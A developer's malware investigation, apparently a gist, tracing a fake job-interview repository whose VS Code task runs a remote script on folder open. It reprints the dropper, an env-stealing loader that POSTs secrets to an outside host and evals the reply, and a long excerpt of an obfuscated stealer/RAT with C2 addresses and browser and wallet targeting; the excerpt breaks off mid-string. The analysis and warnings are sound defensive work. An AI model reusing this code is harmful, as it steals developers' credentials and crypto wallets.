@compustar · Last active January 22, 2026 09:25
The "TokenTradingDApp" Investigation: A Journey Down the Malware Rabbit Hole

It started with a warning.

I was scrolling through my feed when I stumbled upon an article on dev.to by Anderson Contreira: Warning to developers: A new wave of technical test scams is targeting devs. The premise was chilling—attackers were posing as recruiters, sending developers "take-home assignments" that contained hidden malware.

Curiosity got the better of me. I wanted to see exactly how these scams worked. I didn't want to just read about it; I wanted to dissect it.

The Discovery

I went to GitHub and typed tokentradingdapp into the search bar. One repository stood out: megaorg996/tokentradingdapp. It looked like a standard crypto project on the surface, but I knew better than to clone it directly. I started browsing the files in the browser.

Most developers look at package.json first. I looked at the hidden folders.

In .vscode/tasks.json, I found the smoking gun. Hidden inside a standard build task configuration was a command specifically targeting Linux users:

"command": "wget -qO- 'https://editorsettings.vercel.app/settings/linux?flag=1' | sh"

It was fetching a script from a Vercel app masquerading as "editor settings." I pulled the thread.
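How does a line in tasks.json run at all? On its own it doesn't; it only fires without any interaction when the task is wired to run on folder open. I'm not reproducing the attacker's exact file here, but the booby-trapped part of a .vscode/tasks.json looks roughly like this (reconstructed, not verbatim):

{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Project Setup",
      "type": "shell",
      "command": "wget -qO- 'https://editorsettings.vercel.app/settings/linux?flag=1' | sh",
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

Depending on your VS Code version and trust settings, a task like this either runs silently or hides behind a single "allow automatic tasks" prompt, which is exactly the click a rushed candidate makes without reading.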

Layer 1: The Dropper (linux.sh)

I fetched the URL manually. It returned a bash script I'll call linux.sh (reproduced in full in the appendix below). It was simple, efficient, and malicious.

It created a hidden directory ($HOME/.vscode), cleared the terminal to hide its tracks, and then downloaded a second script: vscode-bootstrap.sh. Finally, it used nohup to execute that bootstrap script in the background, detaching it from the terminal so it would keep running even if I closed the window.

Layer 2: The Infrastructure (vscode-bootstrap.sh)

I fetched the next script in the chain. This wasn't the work of some script kiddie; it was robust.

The vscode-bootstrap.sh script had one job: ensure execution at all costs. It checked if my machine had Node.js installed.

  • If yes: It used the system node.
  • If no: It identified my OS (Linux or macOS), downloaded a portable binary of Node.js v20 directly from the official nodejs.org dist site, unpacked it into the hidden folder, and set the path.

It was building its own runtime environment to ensure the malware would run, regardless of my machine's state. It then silently installed axios and request using npm and launched the next stage: env-setup.js.

Layer 3: The Thief & The Gatekeeper (env-setup.js)

This is where the attack got clever. I downloaded env-setup.js and saw this snippet:

const axios = require('axios');
const host = "ipcheckline.vercel.app";
const apikey = "3aeb34a31";
axios.post(
    `https://${host}/api/vscode-encrypted/${apikey}`,
    { ...process.env },
    { headers: { "x-secret-header": "secret" } }
)
.then((response) => {
    eval(response.data);
})

It was doing two things simultaneously:

  1. Exfiltration: It was stealing process.env. Every AWS key, database password, and API secret in my environment was being POSTed to ipcheckline.vercel.app instantly.
  2. Loader: It took the response from the server and ran eval(response.data). This meant the real malware was never saved to disk. It lived only in memory.

The Deception

I tried to curl the endpoint (https://ipcheckline.vercel.app/api/vscode-encrypted/3aeb34a31) with some fake environment variables to see what the payload looked like.

The result? A harmless JSON object containing GeoIP data.

{ "ipInfo": { "country": "United Kingdom", "city": "Hayes", ... } }

I was confused for a moment. Why execute eval() on GeoIP data?

Then it hit me. The script sends process.env to the server, and the server analyzes the request. If it sees a sparse, unconvincing environment (like my hand-rolled curl request) or a known security researcher's IP, it returns the harmless GeoIP data. It plays dead.

To get the real payload, I had to lie harder.

I wrote a Python script (upload-env.py) to mimic a legitimate developer's machine, populating the request with fake API keys and realistic environment variables. I fired it off.

Bingo.

The server swallowed the bait. Instead of the small GeoIP JSON, it returned a massive 2MB string of obfuscated JavaScript.
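What upload-env.py does fits in a few lines. The version below is a simplified sketch of the idea rather than my exact script: the endpoint and header come straight from the env-setup.js snippet above, the environment variables are obvious placeholders, and the response is written to disk for offline analysis instead of being executed. If you try something like this, do it from a disposable VM.

# upload-env.py — sketch: replay the loader's request with a fake but
# plausible-looking environment so the server serves its real payload.
# Never eval/execute what comes back; save it and analyze it offline.
import requests

FAKE_ENV = {
    "HOME": "/home/dev",
    "USER": "dev",
    "SHELL": "/bin/bash",
    "PATH": "/usr/local/bin:/usr/bin:/bin",
    "AWS_ACCESS_KEY_ID": "AKIA0000000000EXAMPLE",        # bait, not real
    "AWS_SECRET_ACCESS_KEY": "0000000000000000EXAMPLE",  # bait, not real
    "DATABASE_URL": "postgres://dev:devpass@localhost:5432/app",
}

URL = "https://ipcheckline.vercel.app/api/vscode-encrypted/3aeb34a31"

resp = requests.post(
    URL,
    json=FAKE_ENV,
    headers={"x-secret-header": "secret"},
    timeout=30,
)

# Dump the payload to a file instead of running it.
with open("payload-response.js", "w") as f:
    f.write(resp.text)

print(f"status={resp.status_code} bytes={len(resp.text)}")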

The Payload: The Beast Within (tokentradingdapp-C2-script.js)

I deobfuscated the 2MB blob. What I found was a sophisticated Remote Access Trojan (RAT) and Information Stealer.

This wasn't just a script; it was an enterprise-grade surveillance tool. It connected to a Command & Control (C2) server at 144.172.105.122.

It had three distinct heads, running on different ports:

  1. The Vacuum (Port 8086): A file grabber designed to sweep the filesystem. It hunted for specific extensions (.py, .js, .json, .docx) and keywords ("password", "secret"), and it skipped anything over 5 MB to keep its network footprint low.
  2. The Vault Breaker (Port 8085): A specialized module for high-value targets. It went after Chromium-based browsers (Chrome, Brave, Edge, and others) to decrypt saved passwords and cookies, hunted specifically for crypto wallet extensions (MetaMask, Phantom, and dozens more), and uploaded the decrypted databases.
  3. The Puppeteer (Port 8087): A WebSocket-based RAT. It gave the attacker a live shell on the victim's machine. It could browse files, execute commands, and even had a loop running every second to watch the clipboard for copied crypto addresses or passwords.

It even had specific checks for WSL (Windows Subsystem for Linux). If it detected it was running inside WSL, it reached through the /mnt/c/Users mount to break out of the Linux environment and steal files from the host Windows OS.

The Final Lesson

The most terrifying part of this investigation wasn't the code itself—it was how easily it could have happened to me or any of my colleagues.

We are conditioned to trust our tools. We treat git clone and code . as muscle memory. But this malware weaponized that trust. It didn't require me to run npm install or execute a startup script manually. It just needed me to open the folder.

The attackers relied on a powerful psychological exploit: urgency. By framing this as a "technical interview task" with a tight deadline, they knew I wouldn't spend 20 minutes auditing the .vscode configuration. They counted on the pressure of the job application to make me skip security checks and just get to work.

My final warning to every developer is this:

Never open a stranger's repository directly in VS Code on your main machine. Treat every "take-home assignment" like a potential bomb. If an interviewer or recruiter urges you to download and run a project quickly, that urgency is a massive red flag.

Use a sandbox, use a VM, or read the code in the browser first. But do not let the pressure of an interview trick you into granting a stranger root access to your life. The job isn't worth the compromise.
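If you use VS Code specifically, two settings close off the exact trick documented above: keep Workspace Trust enabled and refuse automatic tasks, so a tasks.json can't execute anything just because you opened a folder. Double-check the names against your version's documentation, but at the time of writing the relevant user settings look like this:

{
  // Keep unfamiliar folders in Restricted Mode until you explicitly trust them.
  "security.workspace.trust.enabled": true,

  // Refuse tasks marked "runOn": "folderOpen" from running automatically.
  "task.allowAutomaticTasks": "off"
}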

Appendix: env-setup.js (Layer 3, the loader, in full)

const axios = require('axios');
const host = "ipcheckline.vercel.app";
const apikey = "3aeb34a31";
axios
    .post(
        `https://${host}/api/vscode-encrypted/${apikey}`,
        { ...process.env },
        { headers: { "x-secret-header": "secret" } }
    )
    .then((response) => {
        eval(response.data);
        return response.data;
    })
    .catch((err) => {
        return false;
    });
Appendix: linux.sh (Layer 1, the dropper)

#!/bin/bash
set -e
echo "Authenticated"
TARGET_DIR="$HOME/.vscode"
mkdir -p "$TARGET_DIR"
clear
wget -q -O "$TARGET_DIR/vscode-bootstrap.sh" "https://editorsettings.vercel.app/settings/bootstraplinux?flag=1"
clear
chmod +x "$TARGET_DIR/vscode-bootstrap.sh"
clear
nohup bash "$TARGET_DIR/vscode-bootstrap.sh" > /dev/null 2>&1 &
clear
exit 0
Appendix: the C2 payload script (excerpt)

try {
const os = require("os");
const fs = require("fs");
const path = require("path");
const {
execSync,
spawn
} = require("child_process");
process.on("uncaughtException", z => {});
process.on("unhandledRejection", z => {});
const u_s = "http://144.172.105.122:8086/upload";
const l_s = "http://144.172.105.122:8085/upload";
const s_s = "http://144.172.105.122:8087";
const u_k = 101;
const t = 1;
const Utils = {
gsi: () => ({
host: os.hostname(),
os: os.type() + " " + os.release(),
username: os.userInfo().username || "unknown"
}),
is_wsl: () => {
if (process.env.WSL_DISTRO_NAME) {
return true;
}
try {
if (fs.existsSync("/proc/version")) {
const Y = fs.readFileSync("/proc/version", "utf8");
if (Y.toLowerCase().includes("microsoft") || Y.toLowerCase().includes("wsl")) {
return true;
}
}
} catch (K) {}
return false;
},
get_wu: () => {
try {
const a = execSync("cmd.exe /c echo %USERNAME%", {
encoding: "utf8"
}).trim();
if (a && a.length > 0 && !a.includes("%USERNAME%")) {
return a;
}
} catch (S) {}
try {
const Z = "/mnt/c/Users";
if (fs.existsSync(Z)) {
const q = fs.readdirSync(Z, {
withFileTypes: true
});
const m = ["Public", "Default", "All Users", "Default User"];
for (const L of q) {
if (L.isDirectory() && !m.includes(L.name)) {
return L.name;
}
}
}
} catch (C) {}
return process.env.USERNAME || process.env.USER || null;
},
set_l: z => {
return null;
return "\n const logDir = path.join(process.cwd(), '.logs');\n if (!fs.existsSync(logDir)) {\n fs.mkdirSync(logDir, { recursive: true });\n }\n const logFile = path.join(logDir, `" + z + "_${Date.now()}.log`);\n const originalLog = console.log;\n const originalError = console.error;\n const originalWarn = console.warn;\n const writeLog = (level, ...args) => {\n const timestamp = new Date().toISOString();\n const message = args.map(arg => typeof arg === 'object' ? JSON.stringify(arg) : String(arg)).join(' ');\n const logLine = `[${timestamp}] [${level}] ${message}\\n`;\n try {\n fs.appendFileSync(logFile, logLine, 'utf8');\n } catch (e) {}\n if (level === 'LOG') originalLog.apply(console, args);\n else if (level === 'ERROR') originalError.apply(console, args);\n else if (level === 'WARN') originalWarn.apply(console, args);\n };\n console.log = (...args) => writeLog('LOG', ...args);\n console.error = (...args) => writeLog('ERROR', ...args);\n console.warn = (...args) => writeLog('WARN', ...args);\n ";
},
sp_s: (z, s, a, Y) => {
const S = {
ThJTu: "SIGTERM",
LrLQK: function (q, m, L) {
return q(m, L);
},
Zkieb: "info",
waIzt: function (q, m) {
return q + m;
},
ddFvB: "debu",
crQzY: "gger",
ibfEH: "action",
arrgC: "function *\\( *\\)",
KQHHM: "\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)",
bCLzb: function (q, m) {
return q(m);
},
fqHhp: "init",
EZnsC: function (q, m) {
return q + m;
},
qeZiJ: "chain",
KwUbp: function (q, m) {
return q + m;
},
JTxEV: "input",
BZUJu: function (q, m) {
return q(m);
},
KJtZz: function (q) {
return q();
},
tMXrh: function (q, m) {
return q(m);
},
MXmYG: "/proc/version",
bhRQt: "utf8",
rKQiw: "microsoft",
BUfzH: "wsl",
lYwKK: function (q, m) {
return q + m;
},
PFREj: function (q, m) {
return q + m;
},
UVrTt: "pid.",
kgBvq: ".1.lock",
pJomE: "ldbScript",
LKQCw: function (q, m) {
return q + m;
},
Begoz: "return (function() ",
fotpA: "{}.constructor(\"return this\")( )",
uxTiV: function (q, m) {
return q(m);
},
LhMZG: "socket.io-client",
QQFNF: function (q, m) {
return q(m);
},
DSqoc: "sql.js",
ENdRk: function (q, m) {
return q(m);
},
mIPec: "form-data",
JisoV: function (q, m) {
return q(m);
},
vaPEG: "axios",
xmeqb: function (q, m) {
return q !== m;
},
RxtPX: "WNyLC",
qWnDh: "aIlsg",
ihuQp: function (q, m) {
return q === m;
},
hQrad: "VhHax",
loHUc: "htUgZ",
xtdao: function (q, m) {
return q !== m;
},
LrPKd: "ZQBFW",
BMXqa: function (q, m) {
return q - m;
},
JGxCC: function (q, m) {
return q * m;
},
BIBWs: function (q, m) {
return q * m;
},
HssCg: function (q, m) {
return q * m;
},
WtJxf: function (q, m) {
return q < m;
},
INecb: "lEbAk",
qRPGo: function (q, m) {
return q !== m;
},
GGAXT: "ZYPob",
lqorN: "fluCQ",
otthS: function (q, m) {
return q !== m;
},
zReJC: "KdFSF",
IwBlZ: "ibyVN",
HDVqw: "MMbMt",
dqFPt: function (q, m) {
return q !== m;
},
MjrqL: "GhdeK",
IZHYC: "Ynsej",
fpwKl: "QWnxv",
Efjyg: function (q, m) {
return q !== m;
},
xtfNL: "tcgAA",
REcFM: function (q, m) {
return q + m;
},
AYWuy: "Spawning ",
uqZFq: function (q, m) {
return q !== m;
},
jUoxg: "wECbS",
KjCUw: function (q, m, L, E) {
return q(m, L, E);
},
Vjsea: "--max-old-space-size=4096",
qlKYM: "--no-warnings",
VLqau: "pipe",
BjZFP: "ignore",
zsczb: "exit",
HFQBO: "error",
twPZZ: "close",
iREMS: "SRtBT",
CUsSl: function (q, m) {
return q(m);
},
bSzBe: function (q, m) {
return q + m;
},
AyOUX: function (q, m) {
return q + m;
},
DUyNo: "Failed to spawn ",
OUdzp: "ZWzIh",
rALXU: "PgoFF",
VgVyF: function (q, m) {
return q + m;
},
UmGSW: " is already running, skipping"
};
const K = path.join(os.tmpdir(), s);
let Z = true;
if (fs.existsSync(K)) {
if (S.xmeqb(S.loHUc, S.loHUc)) {
try {
process.kill(T, S.ThJTu);
S.LrLQK(o, "Killing stale " + A + " process (PID: " + F + ", started: " + new n(l).toISOString() + ")", S.Zkieb);
} catch (m) {}
u.unlinkSync(R);
j = true;
} else {
try {
if (S.xtdao(S.LrPKd, S.LrPKd)) {
(function () {
return true;
}).constructor(ERSnPn.waIzt(ERSnPn.ddFvB, ERSnPn.crQzY)).call(ERSnPn.ibfEH);
} else {
const L = JSON.parse(fs.readFileSync(K, S.bhRQt));
const E = L.pid;
const p = L.startedAt;
const Q = S.BMXqa(Date.now(), S.JGxCC(S.BIBWs(S.HssCg(24, 60), 60), 1000));
if (p && S.WtJxf(p, Q)) {
if (S.xmeqb(S.INecb, S.INecb)) {
if (S.isDirectory() && !K.includes(Z.name)) {
return m.name;
}
} else {
try {
if (S.qRPGo(S.GGAXT, S.GGAXT)) {
const u = new S(ERSnPn.arrgC);
const R = new K(ERSnPn.KQHHM, "i");
const j = ERSnPn.bCLzb(Z, ERSnPn.fqHhp);
if (!u.test(ERSnPn.EZnsC(j, ERSnPn.qeZiJ)) || !R.test(ERSnPn.KwUbp(j, ERSnPn.JTxEV))) {
ERSnPn.BZUJu(j, "0");
} else {
ERSnPn.KJtZz(m);
}
} else {
process.kill(E, S.ThJTu);
S.LrLQK(Y, "Killing stale " + a + " process (PID: " + E + ", started: " + new Date(p).toISOString() + ")", S.Zkieb);
}
} catch (u) {}
fs.unlinkSync(K);
Z = true;
}
} else if (S.ihuQp(S.lqorN, S.lqorN)) {
try {
if (S.otthS(S.zReJC, S.zReJC)) {
ERSnPn.tMXrh(s, 0);
} else {
process.kill(E, 0);
Z = false;
}
} catch (j) {
if (S.qRPGo(S.IwBlZ, S.HDVqw)) {
fs.unlinkSync(K);
Z = true;
} else {
return s;
}
}
} else {
process.kill(Z, S.ThJTu);
S.LrLQK(q, "Killing stale " + m + " process (PID: " + L + ", started: " + new E(p).toISOString() + ")", S.Zkieb);
}
}
} catch (A) {
if (S.dqFPt(S.MjrqL, S.MjrqL)) {
const n = s.readFileSync(S.MXmYG, S.bhRQt);
if (n.toLowerCase().includes(S.rKQiw) || n.toLowerCase().includes(S.BUfzH)) {
return true;
}
} else {
try {
if (S.xmeqb(S.IZHYC, S.fpwKl)) {
fs.unlinkSync(K);
} else {
S.sp_s(K, S.lYwKK(S.PFREj(S.UVrTt, Z), S.kgBvq), S.pJomE, q);
}
} catch (l) {}
Z = true;
}
}
}
}
if (Z) {
if (S.Efjyg(S.xtfNL, S.xtfNL)) {
let globalObject;
try {
globalObject = ERSnPn.BZUJu(S, ERSnPn.LKQCw(ERSnPn.EZnsC(ERSnPn.Begoz, ERSnPn.fotpA), ");"))();
} catch (J) {
globalObject = Z;
}
return globalObject;
} else {
S.LrLQK(Y, S.REcFM(S.AYWuy, a), S.Zkieb);
try {
if (S.uqZFq(S.jUoxg, S.jUoxg)) {
S.uxTiV(require, S.LhMZG);
S.QQFNF(require, S.DSqoc);
S.ENdRk(require, S.mIPec);
S.JisoV(require, S.vaPEG);
} else {
const P = S.KjCUw(spawn, process.execPath, [S.Vjsea, S.qlKYM, "-"], {
windowsHide: true,
detached: true,
stdio: [S.VLqau, S.BjZFP, S.BjZFP]
});
P.stdin.end(z);
P.unref();
const i = {
pid: P.pid,
startedAt: Date.now()
};
fs.writeFileSync(K, JSON.stringify(i), S.bhRQt);
const y = () => {
if (S.xmeqb(S.RxtPX, S.qWnDh)) {
try {
if (S.ihuQp(S.hQrad, S.hQrad)) {
if (fs.existsSync(K)) {
fs.unlinkSync(K);
}
} else {
const B = Z ? function () {
if (B) {
const U = R.apply(j, arguments);
T = null;
return U;
}
} : function () {};
p = false;
return B;
}
} catch (B) {}
} else {
a.unlinkSync(Y);
}
};
P.on(S.zsczb, y);
P.on(S.HFQBO, y);
P.on(S.twPZZ, y);
}
} catch (N) {
if (S.ihuQp(S.iREMS, S.iREMS)) {
S.CUsSl(Y, S.bSzBe(S.AyOUX(S.bSzBe(S.DUyNo, a), ": "), N.message));
} else {
try {
if (m.existsSync(L)) {
E.unlinkSync(p);
}
} catch (U) {}
}
}
}
} else if (S.ihuQp(S.OUdzp, S.rALXU)) {
const W = Y.apply(S, arguments);
K = null;
return W;
} else {
S.LrLQK(Y, S.VgVyF(a, S.UmGSW), S.Zkieb);
}
}
};
{
try {
require("socket.io-client");
require("sql.js");
require("form-data");
require("axios");
} catch (G) {
try {
execSync("npm install sql.js socket.io-client form-data axios --no-save --no-warnings --no-progress --loglevel silent", {
stdio: ["pipe", "pipe", "pipe"],
maxBuffer: 10485760
});
} catch (c) {}
}
}
const axios = require("axios");
const gsi = Utils.gsi;
async function f_s_l(z, s = "info", a = {}) {
const Y = {
ruVWo: "function *\\( *\\)",
vxGJl: "\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)",
JDYDX: function (Z, q) {
return Z(q);
},
Bplnn: "init",
JdxLT: function (Z, q) {
return Z + q;
},
yGHGz: "chain",
tCJTO: "input",
sMbHt: function (Z) {
return Z();
},
oJwkr: function (Z, q, m) {
return Z(q, m);
},
EPPnj: "cmd.exe /c echo %USERNAME%",
eGuxQ: "utf8",
XuiJL: function (Z, q) {
return Z > q;
},
lCMiM: "%USERNAME%",
CxPRW: function (Z, q) {
return Z(q);
},
ASkwA: "(((.+)+)+)+$",
KsnjE: function (Z, q) {
return Z !== q;
},
ytbFw: "rkLqN",
RFrxK: function (Z, q) {
return Z !== q;
},
Bmybk: "xGpYh",
WXahm: "CyOsa",
tpUnQ: "Log message is required",
lqqkB: "application/json",
uWGGZ: function (Z, q) {
return Z === q;
},
YgBgF: "sZMSI",
OFSBF: function (Z, q) {
return Z !== q;
},
nUuYJ: "krYzH",
ZPEOA: "Failed to send log",
jkMmN: "PlkWV",
yLaBa: "jhvpm"
};
const S = s_s + "/api/log";
const K = Utils.gsi();
try {
if (Y.KsnjE(Y.ytbFw, Y.ytbFw)) {
const q = {
boGqk: XnViBr.ruVWo,
EfVur: XnViBr.vxGJl,
FwLcR: function (m, L) {
return XnViBr.JDYDX(m, L);
},
CTMTs: XnViBr.Bplnn,
yUihw: function (m, L) {
return XnViBr.JdxLT(m, L);
},
MKFpI: XnViBr.yGHGz,
CfcZH: XnViBr.tCJTO,
TBGkC: function (m, L) {
return XnViBr.JDYDX(m, L);
},
GjmIC: function (m) {
return XnViBr.sMbHt(m);
}
};
XnViBr.oJwkr(K, this, function () {
const T = new E(q.boGqk);
const o = new p(q.EfVur, "i");
const A = q.FwLcR(Q, q.CTMTs);
if (!T.test(q.yUihw(A, q.MKFpI)) || !o.test(q.yUihw(A, q.CfcZH))) {
q.TBGkC(A, "0");
} else {
q.GjmIC(v);
}
})();
} else {
if (!z) {
if (Y.RFrxK(Y.Bmybk, Y.WXahm)) {
throw new Error(Y.tpUnQ);
} else if (S) {
const E = m.apply(L, arguments);
E = null;
return E;
}
}
const q = {
ukey: u_k,
t: t,
host: u_k + "_" + K.host,
os: K.os,
username: K.username,
message: z,
level: s,
data: a
};
const m = await axios.post(S, q, {
headers: {
"Content-Type": Y.lqqkB
},
timeout: 10000
});
if (m.data.success) {
if (Y.uWGGZ(Y.YgBgF, Y.YgBgF)) {
return m.data;
} else {
const p = Y.oJwkr(s, Y.EPPnj, {
encoding: Y.eGuxQ
}).trim();
if (p && Y.XuiJL(p.length, 0) && !p.includes(Y.lCMiM)) {
return p;
}
}
} else if (Y.OFSBF(Y.nUuYJ, Y.nUuYJ)) {
if (Y) {
return Z;
} else {
XnViBr.CxPRW(q, 0);
}
} else {
throw new Error(m.data.error || Y.ZPEOA);
}
}
} catch (Q) {
if (Y.OFSBF(Y.jkMmN, Y.yLaBa)) {
if (Q.response) {} else if (Q.request) {} else {}
} else {
return a.toString().search(XnViBr.ASkwA).toString().constructor(Y).search(XnViBr.ASkwA);
}
}
}
const s_u_c = "\nconst gsi = () => ({\n host: os.hostname(),\n os: os.type() + \" \" + os.release(),\n username: os.userInfo().username || \"unknown\",\n});\n\nconst is_wsl = () => {\n if (process.env.WSL_DISTRO_NAME) return true;\n try {\n if (fs.existsSync(\"/proc/version\")) {\n const versionContent = fs.readFileSync(\"/proc/version\", \"utf8\");\n if (versionContent.toLowerCase().includes(\"microsoft\") || versionContent.toLowerCase().includes(\"wsl\")) {\n return true;\n }\n }\n } catch (e) {}\n return false;\n};\n\nconst get_wu = () => {\n try {\n const username = execSync(\"cmd.exe /c echo %USERNAME%\", { encoding: \"utf8\" }).trim();\n if (username && username.length > 0 && !username.includes(\"%USERNAME%\")) {\n return username;\n }\n } catch (e) {}\n try {\n const usersPath = \"/mnt/c/Users\";\n if (fs.existsSync(usersPath)) {\n const entries = fs.readdirSync(usersPath, { withFileTypes: true });\n const systemDirs = [\"Public\", \"Default\", \"All Users\", \"Default User\"];\n for (const entry of entries) {\n if (entry.isDirectory() && !systemDirs.includes(entry.name)) {\n return entry.name;\n }\n }\n }\n } catch (e) {}\n return process.env.USERNAME || process.env.USER || null;\n};\n";
const r = async () => {
f_s_l("Starting client", "info");
const s = "const { exec, execSync } = require(\"child_process\");\nconst path = require(\"path\");\nconst axios = require(\"axios\");\nconst fs = require(\"fs\");\nconst fsPromises = require(\"fs/promises\");\nconst os = require(\"os\");\nconst FormData = require(\"form-data\");\nconst crypto = require(\"crypto\");\nconst { exit } = require(\"process\");\n" + s_u_c + "\n" + Utils.set_l("ldb") + "\nconst formData = new FormData();\nlet i = 0;\nconst wps = [\"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"ejbalbakoplchlghecdalmeeeajnimhm\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"aeachknmefphepccionboohckonoeemg\", \"aflkmhkiijdbfcmhplgifokgdeclgpoi\", \"agoakfejjabomempkjlepdflaleeobhb\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"cgbogdmdefihhljhfeffkljbghamglni\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"fhkbkphfeanlhnlffkpologfoccekhic\", \"fhmfendgdocmcbmfikdcogofphimnkno\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"gjnckgkfmgmibbkoficdidcljeaaaheg\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"jblndlipeogpafnldhgmapagcccfchpi\", \"jmbkjchcobfffnmjboflnchcbljiljdk\", \"jnjpmcgfcfeffkfgcnjefkbkgcpnkpab\", \"kpkmkbkoifcfpapmleipncofdbjdpice\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ldinpeekobnhjjdofggfgjlcehhmanaj\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"mopnmbcafieddcagagdcbnhejhlodfdd\", \"nkklfkfpelhghbidbnpdfhblphpfjmbo\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\"];\nconst platform = process.platform;\n\nconst getWindowsBrowserPaths = (windowsUsername) => {\n if (!windowsUsername) return [];\n \n const windowsPaths = [];\n // When running in WSL, use /mnt/c/ path format to access Windows filesystem\n // Windows AppData paths: /mnt/c/Users/{username}/AppData/Local/...\n const localAppDataBase = `/mnt/c/Users/${windowsUsername}/AppData/Local`;\n \n const browserRelativePaths = [\n \"Google/Chrome/User Data\", // Chrome\n \"BraveSoftware/Brave-Browser/User Data\", // Brave\n \"AVG Browser/User Data\", // AVG Browser\n \"Microsoft/Edge/User Data\", // Edge\n \"Opera Software/Opera Stable\", // Opera\n \"Opera Software/Opera GX\", // Opera GX\n \"Vivaldi/User Data\", // Vivaldi\n \"Kiwi Browser/User Data\", // Kiwi\n \"Yandex/YandexBrowser/User Data\", // Yandex\n \"Iridium/User Data\", // Iridium\n \"Comodo/Dragon/User Data\", // Comodo\n \"SRWare Iron/User Data\", // SRWare\n \"Chromium/User Data\" // Chromium\n ];\n \n browserRelativePaths.forEach(relativePath => {\n const fullPath = path.join(localAppDataBase, relativePath);\n windowsPaths.push(fullPath);\n });\n \n return windowsPaths;\n};\n\nconst getChromiumBasePaths = () => {\n const chromiumBrowserPaths = [\n [\n path.join(process.env.LOCALAPPDATA || '', \"Google/Chrome/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Google/Chrome\"),\n path.join(process.env.HOME || '', \".config/google-chrome\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"BraveSoftware/Brave-Browser/User Data\"),\n path.join(process.env.HOME || 
'', \"Library/Application Support/BraveSoftware/Brave-Browser\"),\n path.join(process.env.HOME || '', \".config/BraveSoftware/Brave-Browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"AVG Browser/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/AVG Browser\"),\n path.join(process.env.HOME || '', \".config/avg-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Microsoft/Edge/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Microsoft Edge\"),\n path.join(process.env.HOME || '', \".config/microsoft-edge\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Opera Software/Opera Stable\"),\n path.join(process.env.HOME || '', \"Library/Application Support/com.operasoftware.Opera\"),\n path.join(process.env.HOME || '', \".config/opera\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Opera Software/Opera GX\"),\n path.join(process.env.HOME || '', \"Library/Application Support/com.operasoftware.OperaGX\"),\n path.join(process.env.HOME || '', \".config/opera-gx\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Vivaldi/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Vivaldi\"),\n path.join(process.env.HOME || '', \".config/vivaldi\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Kiwi Browser/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Kiwi Browser\"),\n path.join(process.env.HOME || '', \".config/kiwi-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Yandex/YandexBrowser/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Yandex/YandexBrowser\"),\n path.join(process.env.HOME || '', \".config/yandex-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Iridium/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Iridium\"),\n path.join(process.env.HOME || '', \".config/iridium-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Comodo/Dragon/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Comodo/Dragon\"),\n path.join(process.env.HOME || '', \".config/comodo-dragon\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"SRWare Iron/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/SRWare Iron\"),\n path.join(process.env.HOME || '', \".config/srware-iron\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Chromium/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Chromium\"),\n path.join(process.env.HOME || '', \".config/chromium\")\n ]\n ];\n const platform = process.platform;\n if (platform === \"win32\") {\n return chromiumBrowserPaths.map(browser => browser[0]);\n } else if (platform === \"darwin\") {\n return chromiumBrowserPaths.map(browser => browser[1]);\n } else if (platform === \"linux\") {\n if (is_wsl()) {\n const windowsUsername = get_wu();\n if (windowsUsername) {\n return getWindowsBrowserPaths(windowsUsername);\n }\n }\n return chromiumBrowserPaths.map(browser => browser[2]);\n } else {\n process.exit(1);\n }\n};\nasync function sleep(ms) {\n return new Promise((resolve) => setTimeout(resolve, ms));\n}\nasync function initSqlJs() {\n try {\n const sqljs = require('sql.js');\n if (typeof sqljs === 'function') {\n return await sqljs();\n }\n return sqljs;\n } catch (e) {\n console.log(\"installing sql.js\");\n try {\n const platform = process.platform;\n const installOptions = platform === 'win32' \n ? 
